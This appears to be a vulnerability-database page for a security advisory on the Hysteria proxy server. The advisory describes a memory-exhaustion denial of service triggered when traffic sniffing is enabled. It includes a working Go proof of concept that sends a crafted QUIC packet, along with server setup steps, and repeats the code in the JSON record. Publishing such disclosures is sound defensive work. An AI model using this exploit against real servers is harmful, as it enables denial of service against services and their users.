GHSA-9FW6-XGG2-MQ9Q

Vulnerability from github – Published: 2026-05-05 21:14 – Updated: 2026-05-05 21:14
VLAI?
Summary
Hysteria: A specially constructed quic package can crash the server OOM when the sniff is enabled
Details

Summary

A specially constructed quic package can crash the server OOM when the sniff is enabled.

Details

When the server has sniff enabled, a valid connection can request the server to forward UDP traffic and construct a huge crypto length. The server will allocate memory according to this length, causing an OOM.

PoC

openssl req -x509 -newkey rsa:2048 -nodes -keyout localhost.key -out localhost.crt -days 365 -subj "/CN=localhost" 2>/dev/null

server.yaml

listen: :8443
tls:
  cert: localhost.crt
  key: localhost.key
auth:
  type: password
  password: mypassword
sniff:
  enable: true
outbounds:
  - name: my_direct
    type: direct
    default: true

poc.go

package main

import (
    "flag"
    "fmt"
    "log"
    "net"
    "time"

    "github.com/apernet/hysteria/core/v2/client"
)

func main() {
    serverAddrStr := flag.String("server", "127.0.0.1:8443", "Hysteria server address")
    password := flag.String("password", "mypassword", "Hysteria server password")
    flag.Parse()

    serverAddr, _ := net.ResolveUDPAddr("udp", *serverAddrStr)
    c, _, err := client.NewClient(&client.Config{
        ServerAddr: serverAddr, Auth: *password, TLSConfig: client.TLSConfig{InsecureSkipVerify: true},
    })
    if err != nil {
        log.Fatalf("Failed to connect: %v", err)
    }
    defer c.Close()

    var maliciousQUICPacket = []byte{                                                                                                                                                                         
        0xcb, 0x0, 0x0, 0x0, 0x1, 0x8, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11, 0x0, 0x0,                                                                                                              
        0x32, 0x1d, 0xa8, 0xd6, 0x3c, 0x51, 0x24, 0xb7, 0xbe, 0xf2, 0x91, 0x77, 0x1c, 0x9d, 0x66,                                                                                                             
        0xfc, 0xab, 0x91, 0x1e, 0xaf, 0xf9, 0x14, 0xd5, 0xec, 0xb0, 0x74, 0x46, 0x4f, 0x4, 0x70,                                                                                                              
        0x18, 0x35, 0x31, 0xc5, 0xea, 0x36, 0x40, 0x36, 0x65, 0xdf, 0xa4, 0xcc, 0xf9, 0xff, 0x65,                                                                                                             
        0xe5, 0x1d, 0xb7, 0xc5, 0xc2, 0xc2,                                                                                                                                                                   
    } 

    udpConn, err := c.UDP()
    if err != nil {
        fmt.Printf("[-] UDP error: %v\n", err)
    }
    targetAddr := fmt.Sprintf("8.8.8.8:443")
    fmt.Printf("[*] Sending 'death' packet to %s...\n", targetAddr)
    _ = udpConn.Send(maliciousQUICPacket, targetAddr)

    // Wait longer to ensure packet delivery
    time.Sleep(3 * time.Second)
    fmt.Printf("[+] Done.\n")
}

Impact

When sniffing is enabled on the server, a user with a valid password can launch an attack that could cause the server to run out of memory (OOM).

Severity ?
8.8 (High)
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/apernet/hysteria/core/v2"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "2.8.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-770"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-05T21:14:22Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### Summary\n\nA specially constructed quic package can crash the server OOM when the sniff is enabled.\n\n### Details\n\nWhen the server has sniff enabled, a valid connection can request the server to forward UDP traffic and construct a huge crypto length. The server will allocate memory according to this length, causing an OOM.\n\n\n### PoC\n```\nopenssl req -x509 -newkey rsa:2048 -nodes -keyout localhost.key -out localhost.crt -days 365 -subj \"/CN=localhost\" 2\u003e/dev/null\n```\n\nserver.yaml\n```\nlisten: :8443\ntls:\n  cert: localhost.crt\n  key: localhost.key\nauth:\n  type: password\n  password: mypassword\nsniff:\n  enable: true\noutbounds:\n  - name: my_direct\n    type: direct\n    default: true\n```\n\npoc.go\n\n```\npackage main\n\nimport (\n\t\"flag\"\n\t\"fmt\"\n\t\"log\"\n\t\"net\"\n\t\"time\"\n\n\t\"github.com/apernet/hysteria/core/v2/client\"\n)\n\nfunc main() {\n\tserverAddrStr := flag.String(\"server\", \"127.0.0.1:8443\", \"Hysteria server address\")\n\tpassword := flag.String(\"password\", \"mypassword\", \"Hysteria server password\")\n\tflag.Parse()\n\n\tserverAddr, _ := net.ResolveUDPAddr(\"udp\", *serverAddrStr)\n\tc, _, err := client.NewClient(\u0026client.Config{\n\t\tServerAddr: serverAddr, Auth: *password, TLSConfig: client.TLSConfig{InsecureSkipVerify: true},\n\t})\n\tif err != nil {\n\t\tlog.Fatalf(\"Failed to connect: %v\", err)\n\t}\n\tdefer c.Close()\n                                                                                                                \n\tvar maliciousQUICPacket = []byte{                                                                                                                                                                         \n\t\t0xcb, 0x0, 0x0, 0x0, 0x1, 0x8, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11, 0x0, 0x0,                                                                                                              \n\t\t0x32, 0x1d, 0xa8, 0xd6, 0x3c, 0x51, 0x24, 0xb7, 0xbe, 0xf2, 0x91, 0x77, 0x1c, 0x9d, 0x66,                                                                                                             \n\t\t0xfc, 0xab, 0x91, 0x1e, 0xaf, 0xf9, 0x14, 0xd5, 0xec, 0xb0, 0x74, 0x46, 0x4f, 0x4, 0x70,                                                                                                              \n\t\t0x18, 0x35, 0x31, 0xc5, 0xea, 0x36, 0x40, 0x36, 0x65, 0xdf, 0xa4, 0xcc, 0xf9, 0xff, 0x65,                                                                                                             \n\t\t0xe5, 0x1d, 0xb7, 0xc5, 0xc2, 0xc2,                                                                                                                                                                   \n\t} \n\n\tudpConn, err := c.UDP()\n\tif err != nil {\n\t\tfmt.Printf(\"[-] UDP error: %v\\n\", err)\n\t}\n\ttargetAddr := fmt.Sprintf(\"8.8.8.8:443\")\n\tfmt.Printf(\"[*] Sending \u0027death\u0027 packet to %s...\\n\", targetAddr)\n\t_ = udpConn.Send(maliciousQUICPacket, targetAddr)\n\n\t// Wait longer to ensure packet delivery\n\ttime.Sleep(3 * time.Second)\n\tfmt.Printf(\"[+] Done.\\n\")\n}\n```\n\n\n### Impact\nWhen sniffing is enabled on the server, a user with a valid password can launch an attack that could cause the server to run out of memory (OOM).",
  "id": "GHSA-9fw6-xgg2-mq9q",
  "modified": "2026-05-05T21:14:22Z",
  "published": "2026-05-05T21:14:22Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/apernet/hysteria/security/advisories/GHSA-9fw6-xgg2-mq9q"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/apernet/hysteria"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Hysteria: A specially constructed quic package can crash the server OOM when the sniff is enabled"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.